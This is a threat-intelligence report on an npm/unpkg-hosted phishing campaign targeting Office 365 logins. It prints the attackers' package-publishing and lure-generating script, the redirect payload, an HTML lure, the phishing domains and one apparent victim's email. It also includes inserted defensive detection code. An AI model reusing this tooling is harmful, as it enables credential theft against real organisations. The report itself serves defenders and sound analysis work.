175 Malicious npm Packages Host Phishing Infrastructure Targeting 135+ Organizations

175 malicious npm packages (26k+ downloads) used unpkg CDN to host redirect scripts for a credential-phishing campaign targeting 135+ organizations worldwide.

Kush Pandya

October 9, 2025

Socket's Threat Research Team uncovered 175 malicious npm packages which have collectively accumulated over 26,000 downloads, serving as infrastructure for a widespread phishing campaign targeting 135+ industrial, technology, and energy companies worldwide.

While the packages' randomized names make accidental developer installation unlikely, the download counts likely include security researchers, automated scanners, and CDN infrastructure analyzing the packages after disclosure. The campaign, which we're calling "Beamglea" based on consistent artifacts across all packages, uses npm's public registry and unpkg.com's CDN to host redirect scripts that funnel victims to credential harvesting pages. The origin and meaning of "beamglea" remain unclear; it may be a codename, an inside reference, or a randomly chosen identifier picked by the threat actors.

Prior to this disclosure, the term had virtually no presence online, making it an effective tracking identifier for this specific operation. Most of the packages associated with this campaign are currently live at the time of writing. We have petitioned for their removal as well as the suspension of the threat actor’s accounts from the npm registry.

This discovery builds on initial findings by Paul McCarty at Safety, who first identified the phishing infrastructure on September 24, 2025. Socket's AI scanner independently flagged these packages and additional variants, expanding the analysis from the initial discovery to document the current 175-package campaign infrastructure.

Socket's AI Scanner flagging the malicious redirect-nf0qo1 package

Supply Chain as Phishing Infrastructure

The npm packages themselves don't execute malicious code when installed via npm install. Instead, they exploit npm as free, global hosting infrastructure for phishing attacks. unpkg[.]com is a legitimate, widely-used CDN service that automatically serves any public npm package over HTTPS. The threat actors abuse this trusted infrastructure to host their phishing components without paying for servers or SSL certificates.

Here's the complete attack chain:

  1. Package Publication: Threat actors publish packages with random six-character names following the pattern redirect-[a-z0-9]{6} to npm
  2. Automatic CDN Hosting: unpkg.com immediately makes these packages available via HTTPS CDN URLs like https://unpkg[.]com/redirect-xs13nr@1.0.0/beamglea.js
  3. Possible Phishing Lure Distribution: Threat actors may distribute HTML files themed as purchase orders and project documents to targeted victims. While the exact distribution method is unclear, the business document themes and victim-specific customization suggest email attachment or phishing link delivery.
  4. Victim Execution: When victims open the HTML file, it loads JavaScript from the unpkg.com CDN
  5. Credential Harvesting: The script redirects victims to phishing pages that capture their credentials

Microsoft OAuth phishing page with pre-filled victim email at cfn.jackpotmastersdanske[.]com

The npm ecosystem becomes unwitting infrastructure rather than a direct attack vector. Developers who install these packages see no malicious behavior, but victims opening specially crafted HTML files are redirected to phishing sites.

Automated Package Generation

The threat actors developed Python tooling to automate the entire campaign. Across multiple packages, we found redirect_generator.py scripts and PyInstaller-compiled executables that handle:

def generate_random_package_name(prefix="redirect-"):
    # Generates random 6-character suffix
    suffix = ''.join(random.choices(string.ascii_lowercase + string.digits, k=6))
    return prefix + suffix

# Template processing replaces placeholders with victim-specific data
template_js = load_template('beamglea_template.js')
final_js = template_js.replace("{{EMAIL}}", email).replace("{{URL}}", redirect_url)
with open("beamglea.js", "w", encoding="utf-8") as f:
    f.write(final_js)
    
# === 3. Ensure NPM Login ===
npm_user = npm_logged_in()
if not npm_user:
    print("🔑 You are not logged in to npm. Please enter your credentials:")
    npm_username = input("NPM Username: ")
    npm_password = input("NPM Password: ")
    npm_email = input("NPM Email: ")

    login_input = f"{npm_username}\n{npm_password}\n{npm_email}\n"
    run_cmd(["npm", "login"], input_text=login_input)

    npm_user = npm_logged_in()

print(f"✅ Logged in as {npm_user}")

# === 4. Create Package ===
package_name = generate_random_package_name()
package_json_path = "package.json"
initial_version = "1.0.0"

if os.path.exists(package_json_path):
    with open(package_json_path, "r", encoding="utf-8") as f:
        existing_package = json.load(f)
        if existing_package.get("name") == package_name:
            initial_version = bump_version(existing_package.get("version", "1.0.0"))

package_json = {
    "name": package_name,
    "version": initial_version,
    "main": "beamglea.js"
}

with open(package_json_path, "w", encoding="utf-8") as f:
    json.dump(package_json, f, indent=4)

# === 5. Publish to NPM ===
print("📦 Publishing to npm...")
try:
    run_cmd(["npm", "publish", "--access", "public"])
except SystemExit:
    print("⚠️ Trying to bump version and retry...")
    with open(package_json_path, "r", encoding="utf-8") as f:
        pj = json.load(f)
    pj["version"] = bump_version(pj["version"])
    with open(package_json_path, "w", encoding="utf-8") as f:
        json.dump(pj, f, indent=4)
    run_cmd(["npm", "publish", "--access", "public"])

print("✅ Package published!")

# === 6. Generate redirect.html ===
package_version = package_json["version"]
cdn_url = f"https://unpkg.com/{package_name}@{package_version}/beamglea.js"

html_content = f"""<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta name="html-meta" content="nb830r6x">
    <title></title>
</head>
<body>
   <div class="appcontainer"></div>
   <script src="{cdn_url}"></script>
</body>
</html>
"""

output_dir = "output"
os.makedirs(output_dir, exist_ok=True)

with open(os.path.join(output_dir, "redirect.html"), "w", encoding="utf-8") as f:
    f.write(html_content)

The automation takes three inputs: a JavaScript template file (beamglea_template.js), the victim's email address, and the phishing URL. It then:

  1. Authenticates to npm: Checks if logged in, prompts for credentials if needed
  2. Processes templates: Injects victim email and phishing URL into JavaScript
  3. Creates package: Generates package.json with random name
  4. Publishes to npm: Automatically publishes as a public package
  5. Generates HTML lure: Creates the HTML file with unpkg.com CDN reference to the newly published package

This automation enabled the threat actors to create 175 unique packages targeting different organizations without manual intervention for each victim.

Threat actor zamaniboss profile

The JavaScript Payload

Each package contains a simple redirect script named beamglea.js:

function processAndRedirect() {
    var email = "victim@company.com";  // Customized per target
    var urlPath = "https://cfn.jackpotmastersdanske.com/TJImeEKD";
    var finalUrl = urlPath + "#" + email;
    window.location.href = finalUrl;
}
processAndRedirect();

The script appends the victim's email as a URL fragment. URL fragments appear after the # symbol and are not sent to web servers in HTTP requests, which means they don't appear in standard server access logs. The phishing page reads the email from JavaScript context and pre-fills login forms, creating an appearance of legitimacy.

HTML Phishing Lures

We identified 630+ HTML files across the 175 packages, all located in each package's output folder and themed as business documents to avoid suspicion:

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="html-meta" content="nb830r6x">
    <title></title>
</head>
<body>
   <div class="appcontainer"></div>
   <script src="https://unpkg.com/redirect-xs13nr@1.0.0/beamglea.js"></script>
</body>
</html>

The campaign identifier nb830r6x appears in the meta tag of all HTML files. Filenames mimic legitimate business documents:

These HTML files load JavaScript from unpkg[.]com when opened in a browser, triggering the redirect to credential phishing pages.

When victims open these HTML files in a browser, the JavaScript immediately redirects to the phishing domain while passing the victim's email address via URL fragment. The phishing page then pre-fills the email field, creating a convincing appearance that the victim is accessing a legitimate login portal that already recognizes them. The pre-filled address significantly increases the attack's success rate by reducing victim suspicion.

Command and Control Infrastructure

The campaign uses seven phishing domains:

Primary Infrastructure (51% of packages):

  • cfn.jackpotmastersdanske[.]com with path /TJImeEKD

Secondary Infrastructure:

  • musicboxcr[.]com with base64-encoded parameters
  • villasmbuva[.]co[.]mz (Mozambique TLD)
  • cfn.fejyhy[.]com
  • cfn.fenamu[.]com
  • cfn.notwinningbutpartici[.]com
  • elkendinsc[.]com

Some domains use base64-encoded URL parameters that reveal targeting specifics:

/s/?c3Y9bzM2NV8xX25vbSZtPThvJnVpZD1VU0VSMjMwOTIwMjVVMzkwOTIzMTQmdD1oSA==N0123N

Decoded:
sv=o365_1_nom    // Office 365, variant 1, no MFA
m=8o             // Campaign identifier
uid=USER23092025U39092314  // Session tracking: Sept 23, 2025 at 09:23:14
t=hH             // Token

The o365_1_nom parameter indicates the phishing pages specifically target Office 365 accounts without multi-factor authentication enabled.
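Decoding these parameters by hand is error-prone, so a small decoder helps when triaging URLs of this shape. The following Python is an added example, not code from the article or from Socket. It splits the base64 token off the query string, separates the trailing tag (N0123N in the sample above, assumed here to sit after the base64 padding), parses the decoded key/value pairs, and flags the "_nom" suffix that the article reads as "no MFA" so those accounts can be prioritized for password resets. The sample path is the one quoted above; the per-key notes reproduce the article's interpretation, and the helper names are my own.

```python
import base64
import re
from urllib.parse import parse_qs

# Constructed sample in the shape quoted above: base64 token in the query,
# then a trailing tag ("N0123N") that is not part of the encoded data.
SAMPLE_PATH = "/s/?c3Y9bzM2NV8xX25vbSZtPThvJnVpZD1VU0VSMjMwOTIwMjVVMzkwOTIzMTQmdD1oSA==N0123N"

# Interpretation of each key, reproduced from the article's own decoding.
PARAM_NOTES = {
    "sv": "service/variant flag (o365_1_nom: Office 365, variant 1, no MFA)",
    "m": "campaign identifier",
    "uid": "session tracking id",
    "t": "token",
}

# Assumption: the token ends with base64 padding, which is what separates it
# from the trailing tag. Without padding the tag cannot be told apart.
TOKEN_RE = re.compile(r"^(?P<b64>[A-Za-z0-9+/]+={1,2})(?P<tail>.*)$")


def split_token(query: str):
    """Return (base64_token, trailing_tag) for the query part of the path."""
    m = TOKEN_RE.match(query)
    if m:
        return m.group("b64"), m.group("tail")
    # No padding visible: treat the whole query as the token (tag unrecoverable).
    return query, ""


def decode_tracking_query(path: str) -> dict:
    """Decode the base64 query token of a path like SAMPLE_PATH.

    Returns the raw decoded string, the parsed key/value pairs, the trailing
    tag, and the article's note for each recognised key.
    """
    if "?" not in path:
        raise ValueError("no query string in path")
    token, tail = split_token(path.split("?", 1)[1])
    token += "=" * (-len(token) % 4)  # repair missing padding, if any
    raw = base64.b64decode(token, validate=True).decode("utf-8", errors="replace")
    params = {k: v[0] for k, v in parse_qs(raw, keep_blank_values=True).items()}
    return {
        "decoded": raw,
        "params": params,
        "trailing_tag": tail,
        "notes": {k: PARAM_NOTES.get(k, "unknown key") for k in params},
    }


def targets_no_mfa(params: dict) -> bool:
    """True when the 'sv' flag carries the '_nom' suffix the article reads as 'no MFA'."""
    return params.get("sv", "").endswith("_nom")


if __name__ == "__main__":
    result = decode_tracking_query(SAMPLE_PATH)
    for key, value in result["params"].items():
        print(f"{key}={value}  # {result['notes'][key]}")
    print("trailing tag:", result["trailing_tag"])
    print("targets accounts without MFA:", targets_no_mfa(result["params"]))
```

The uid value is left as an opaque string: the article reads a date and time out of it, but the exact layout is not documented, so the decoder does not guess at it.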

Targeted Industries and Organizations

The campaign targeted 135+ unique email addresses across 100+ organizations, with heavy focus on:

Industrial Manufacturing (35%):

  • Algodue (industrial equipment)
  • Piusi (fluid handling)
  • Stratasys (3D printing)
  • ArcelorMittal (steel/mining)
  • Demag Cranes (material handling)

Technology/Electronics (20%):

  • Moxa (industrial networking)
  • D-Link (networking equipment)
  • Renishaw (precision measurement)

Energy/Chemical (15%):

  • Sasol (chemical/energy)
  • ThyssenKrupp Nucera (hydrogen technology)
  • H2 Systems (hydrogen solutions)

Most Targeted: sraka@hust[.]hr appeared in 19 separate packages, suggesting either high-value targeting or a persistent campaign against this Croatian industrial organization.

Geographic targeting focused heavily on Western Europe (Germany, Netherlands, Belgium, Italy) with secondary focus on Nordic countries and Asia-Pacific. Notably absent were US-based targets.

Campaign Scale and Effect

Infrastructure Metrics:

  • 175 npm packages published
  • 9 npm author accounts
  • 630+ HTML phishing lures
  • 7 command and control domains
  • 135+ targeted organizations
  • Campaign identifier: nb830r6x

Operational Security Indicators:

  • Automated package generation tooling
  • PyInstaller-compiled executables for ease of use
  • Documentation for setting up custom CDN infrastructure
  • Multiple domain registrations for redundancy
  • Randomized package names to evade pattern detection

The presence of cdn_setup_guide.txt in some packages shows long-term planning. The guide provides instructions for setting up independent hosting infrastructure using VPS and Nginx, reducing reliance on unpkg.com's CDN.

Outlook and Recommendations

This campaign demonstrates how threat actors weaponize legitimate infrastructure at scale. By publishing 175 packages across 9 accounts and automating victim-specific HTML generation, the attackers created resilient phishing infrastructure that costs nothing to host and leverages trusted CDN services. The combination of npm's open registry, unpkg.com's automatic serving, and minimal code creates a reproducible playbook that other threat actors will adopt.

Defenders should expect this technique to evolve. Likely variations include migration to other CDN services (jsDelivr, cdnjs), incorporation of additional evasion through domain generation algorithms for phishing endpoints, time-based activation beyond simple redirects, and obfuscation of the JavaScript payload to complicate static analysis.

The campaign identifier nb830r6x in HTML meta tags suggests tracking across multiple operations, indicating organized threat actor infrastructure rather than opportunistic attacks. Expect C2 domain rotation, geofenced phishing pages that only activate for specific geographic regions or during business hours, and HTML attachments with increased sophistication mimicking DocuSign, Microsoft Office, or Adobe PDF viewers.

Organizations should treat any detection of these IOCs as an active breach requiring immediate response:

  • Force password resets for all potentially compromised accounts listed in the IOC section, prioritizing Office 365 credentials given the o365_1_nom targeting parameter.
  • Enable MFA across all business email and cloud services, with special attention to accounts lacking multi-factor authentication.
  • Review email gateway logs for HTML attachments delivered between September and October 2025, particularly files with purchase order themes or project document naming patterns.
  • Audit financial systems and wire transfer logs for unauthorized transactions, as business email compromise typically follows credential harvesting within 24-72 hours.
  • Deploy network monitoring for the seven C2 domains and unpkg.com requests matching the redirect-*/beamglea.js pattern.

Beyond immediate incident response, implement defensive controls that prevent similar attacks. Configure email gateways to quarantine HTML attachments or strip them entirely, as legitimate business communication rarely requires HTML file transfers. Deploy web content filtering that blocks or alerts on unpkg.com requests to packages matching suspicious patterns, though balance this against legitimate CDN usage by development teams. Add endpoint detection rules for HTML files in Downloads folders that contain unpkg.com script references, particularly those with empty titles and minimal content. Implement browser history analysis looking for sequential navigation from local HTML files to external domains with email fragments in the URL.
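The monitoring item in the list above (unpkg.com requests matching redirect-*/beamglea.js and the seven C2 domains) and the endpoint and browser-history controls in this paragraph can be expressed as a few concrete checks. The following Python is an added example, not code from the article or from Socket. It classifies an HTML file against the lure traits described in this post (unpkg.com redirect-*/beamglea.js script reference, the nb830r6x meta tag, an empty title, no visible content), scans proxy log lines for the C2 domains and the CDN pattern, and walks a browser-history list for a local HTML file followed by an external URL carrying an email address in its fragment, which, as noted in "The JavaScript Payload" section, is the only place that address is visible because fragments never reach the server. The four-field log format, the lure file name, the client IPs and the timestamps are constructed sample data; the domains and the package name come from this post.

```python
import re
from urllib.parse import urlsplit

# The seven phishing domains listed in the article, with the defanging
# brackets removed so they match what appears in real logs.
C2_DOMAINS = {
    "cfn.jackpotmastersdanske.com",
    "musicboxcr.com",
    "villasmbuva.co.mz",
    "cfn.fejyhy.com",
    "cfn.fenamu.com",
    "cfn.notwinningbutpartici.com",
    "elkendinsc.com",
}
CAMPAIGN_META = "nb830r6x"
# CDN URL shape used by the lures: redirect-<6 chars>@<version>/beamglea.js
LURE_SCRIPT_RE = re.compile(
    r"https?://unpkg\.com/redirect-[a-z0-9]{6}@[0-9][0-9.]*/beamglea\.js", re.I)
META_RE = re.compile(r'<meta\s+name="html-meta"\s+content="([^"]+)"', re.I)
EMPTY_TITLE_RE = re.compile(r"<title>\s*</title>", re.I)
SCRIPT_STYLE_RE = re.compile(r"<(script|style)[^>]*>.*?</\1>", re.S | re.I)
TAG_RE = re.compile(r"<[^>]+>")


def classify_html_lure(html: str) -> list:
    """Return the indicators found in one HTML file (empty list = nothing matched)."""
    reasons = []
    if LURE_SCRIPT_RE.search(html):
        reasons.append("unpkg redirect-*/beamglea.js script reference")
    m = META_RE.search(html)
    if m and m.group(1) == CAMPAIGN_META:
        reasons.append("campaign meta tag " + CAMPAIGN_META)
    if EMPTY_TITLE_RE.search(html):
        reasons.append("empty <title>")
    # "minimal content": nothing visible once scripts, styles and tags are removed
    if not TAG_RE.sub("", SCRIPT_STYLE_RE.sub("", html)).strip():
        reasons.append("no visible body text")
    return reasons


def scan_proxy_log(lines) -> list:
    """Flag requests to the C2 domains or to lure scripts on unpkg.com.

    Assumed (constructed) log shape: '<timestamp> <client-ip> <method> <url>'.
    """
    hits = []
    for line in lines:
        parts = line.split()
        if len(parts) < 4:
            continue
        ts, client, _method, url = parts[:4]
        host = (urlsplit(url).hostname or "").lower()
        if host in C2_DOMAINS:
            hits.append({"ts": ts, "client": client, "url": url, "reason": "known C2 domain"})
        elif LURE_SCRIPT_RE.search(url):
            hits.append({"ts": ts, "client": client, "url": url, "reason": "unpkg lure script"})
    return hits


def find_lure_navigations(visits, window_s: int = 10) -> list:
    """Browser-history check: a local .html file followed within window_s seconds
    by an external URL whose fragment looks like an e-mail address. The fragment
    never reaches the web server, so this is only visible on the client side.

    visits: iterable of (epoch_seconds, url), sorted by time.
    """
    flagged = []
    last_local = None
    for ts, url in visits:
        parts = urlsplit(url)
        if parts.scheme == "file" and parts.path.lower().endswith((".html", ".htm")):
            last_local = (ts, url)
        elif (last_local and parts.scheme in ("http", "https")
              and "@" in parts.fragment and ts - last_local[0] <= window_s):
            flagged.append({"lure": last_local[1], "redirect": url, "fragment": parts.fragment})
    return flagged


# Constructed sample data so the block runs stand-alone.
SAMPLE_HTML = """<!DOCTYPE html>
<html lang="en"><head><meta charset="UTF-8">
<meta name="html-meta" content="nb830r6x"><title></title></head>
<body><div class="appcontainer"></div>
<script src="https://unpkg.com/redirect-xs13nr@1.0.0/beamglea.js"></script></body></html>"""

SAMPLE_LOG = [
    "1759000000 10.0.0.5 GET https://unpkg.com/redirect-xs13nr@1.0.0/beamglea.js",
    "1759000001 10.0.0.5 GET https://cfn.jackpotmastersdanske.com/TJImeEKD",
    "1759000002 10.0.0.7 GET https://unpkg.com/react@18.2.0/umd/react.production.min.js",
]

SAMPLE_VISITS = [
    (1759000000, "file:///C:/Users/jdoe/Downloads/Purchase_Order_4471.html"),
    (1759000001, "https://cfn.jackpotmastersdanske.com/TJImeEKD#jdoe@example.com"),
]
```

The third log line shows why the CDN pattern is anchored on the redirect- prefix and the beamglea.js file name rather than on unpkg.com alone: ordinary development traffic to the same CDN must not trip the rule.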

Indicators of Compromise (IOCs)

npm Packages

  1. redirect-04g1my
  2. redirect-0g91q6
  3. redirect-0vaxnw
  4. redirect-1akzwg
  5. redirect-1hvx9g
  6. redirect-1knxok
  7. redirect-1p89nj
  8. redirect-1st7z7
  9. redirect-1tokin
  10. redirect-1ubpyu
  11. redirect-1wc4gw
  12. redirect-24nt59
  13. redirect-24srjd
  14. redirect-297vpk
  15. redirect-2aie58
  16. redirect-3viu68
  17. redirect-406s9z
  18. redirect-47cprv
  19. redirect-4a6uhw
  20. redirect-4dcjkh
  21. redirect-4iyfat
  22. redirect-4nwrkg
  23. redirect-4r6ynv
  24. redirect-53bw0r
  25. redirect-57j5wb
  26. redirect-594t6h
  27. redirect-5cxzgs
  28. redirect-5iqds5
  29. redirect-5lpuku
  30. redirect-5r42if
  31. redirect-63cl4f
  32. redirect-6lvcjm
  33. redirect-7bqfg6
  34. redirect-7qnew0
  35. redirect-7vw41m
  36. redirect-7yqujr
  37. redirect-8f3x70
  38. redirect-8py8qs
  39. redirect-8ynd96
  40. redirect-95fl17
  41. redirect-9iak88
  42. redirect-a1gs61
  43. redirect-a1jnfo
  44. redirect-aw9itj
  45. redirect-b9diha
  46. redirect-b9fv9e
  47. redirect-byj4f5
  48. redirect-c1n05c
  49. redirect-ch5ayp
  50. redirect-ci4ynt
  51. redirect-cj50k2
  52. redirect-cn040w
  53. redirect-colaux
  54. redirect-cuvccp
  55. redirect-cwfpnz
  56. redirect-cx4vm0
  57. redirect-d0qfku
  58. redirect-dna9sd
  59. redirect-dravb9
  60. redirect-e19jye
  61. redirect-e761hq
  62. redirect-eeu53f
  63. redirect-elvwba
  64. redirect-eqtqym
  65. redirect-evb9wa
  66. redirect-ewce43
  67. redirect-f1wut9
  68. redirect-f72kyw
  69. redirect-fd91u6
  70. redirect-fhelhf
  71. redirect-fohapy
  72. redirect-fwx2y7
  73. redirect-g0ew1n
  74. redirect-g7gn31
  75. redirect-g7v030
  76. redirect-gbgbgh
  77. redirect-gjl674
  78. redirect-gzixvc
  79. redirect-gzkgcn
  80. redirect-h0i672
  81. redirect-h4y8f0
  82. redirect-hi5ag9
  83. redirect-ht8x82
  84. redirect-hx522h
  85. redirect-icp3vd
  86. redirect-igk4sd
  87. redirect-iocz0a
  88. redirect-j0rs4a
  89. redirect-j5blfb
  90. redirect-j8m62u
  91. redirect-jr2idt
  92. redirect-jw31kl
  93. redirect-k1jlsf
  94. redirect-k4s26t
  95. redirect-k5j1u7
  96. redirect-klea4q
  97. redirect-ksm5w7
  98. redirect-kz5pf4
  99. redirect-l0m7on
  100. redirect-l3td5c
  101. redirect-l6qi9e
  102. redirect-lbgja3
  103. redirect-ld0k2a
  104. redirect-lp2xe6
  105. redirect-ltlpoj
  106. redirect-lxzc6c
  107. redirect-m92q7h
  108. redirect-mop8sg
  109. redirect-mrdlde
  110. redirect-mz4116
  111. redirect-n06xhl
  112. redirect-n0c0pt
  113. redirect-n2wvec
  114. redirect-n79iht
  115. redirect-n95xyv
  116. redirect-nf0qo1
  117. redirect-nixl3q
  118. redirect-njmr1g
  119. redirect-noyuan
  120. redirect-nq70u6
  121. redirect-nqfhsn
  122. redirect-nron9d
  123. redirect-nuyvwk
  124. redirect-nzoblt
  125. redirect-o92d2h
  126. redirect-oroq43
  127. redirect-p8ris1
  128. redirect-pkkd5s
  129. redirect-pqigpl
  130. redirect-prhts6
  131. redirect-q2htwu
  132. redirect-q4vs8m
  133. redirect-q84l3v
  134. redirect-qbzqro
  135. redirect-qrah57
  136. redirect-qx2www
  137. redirect-r0ajvl
  138. redirect-r3s2jv
  139. redirect-rc2ewa
  140. redirect-rmunkl
  141. redirect-rrfeb9
  142. redirect-s7usff
  143. redirect-shqv6v
  144. redirect-sjcr8c
  145. redirect-sormfb
  146. redirect-sr2min
  147. redirect-sykre1
  148. redirect-t09ul0
  149. redirect-t65vz6
  150. redirect-t8kcsk
  151. redirect-u0e2q7
  152. redirect-ubp4cs
  153. redirect-uc8xfg
  154. redirect-udmf0u
  155. redirect-uplctp
  156. redirect-uxwcv8
  157. redirect-v74zee
  158. redirect-vlgk2c
  159. redirect-vpvoos
  160. redirect-w9cx9u
  161. redirect-whb6rt
  162. redirect-wu8gx9
  163. redirect-x2giv7
  164. redirect-x4imdv
  165. redirect-xgcv6j
  166. redirect-xi84nq
  167. redirect-xs13nr
  168. redirect-y8p47m
  169. redirect-ystrj5
  170. redirect-ytimeb
  171. redirect-za4566
  172. redirect-zbhdm7
  173. redirect-zfwzmc
  174. redirect-zoju4g
  175. redirect-homer-flajpt

Malicious Domains:

  • cfn.jackpotmastersdanske[.]com
  • musicboxcr[.]com
  • villasmbuva[.]co[.]mz
  • cfn.fejyhy[.]com
  • cfn.fenamu[.]com
  • cfn.notwinningbutpartici[.]com
  • elkendinsc[.]com

npm Aliases and Registration Emails:

HTML Meta Tag

  • nb830r6x

MITRE ATT&CK Techniques

  • T1195.002 — Supply Chain Compromise: Compromise Software Supply Chain
  • T1583.001 — Acquire Infrastructure: Domains
  • T1584.004 — Compromise Infrastructure: Server
  • T1566.001 — Phishing: Spearphishing Attachment
  • T1566.002 — Phishing: Spearphishing Link
  • T1056.003 — Input Capture: Web Portal Capture
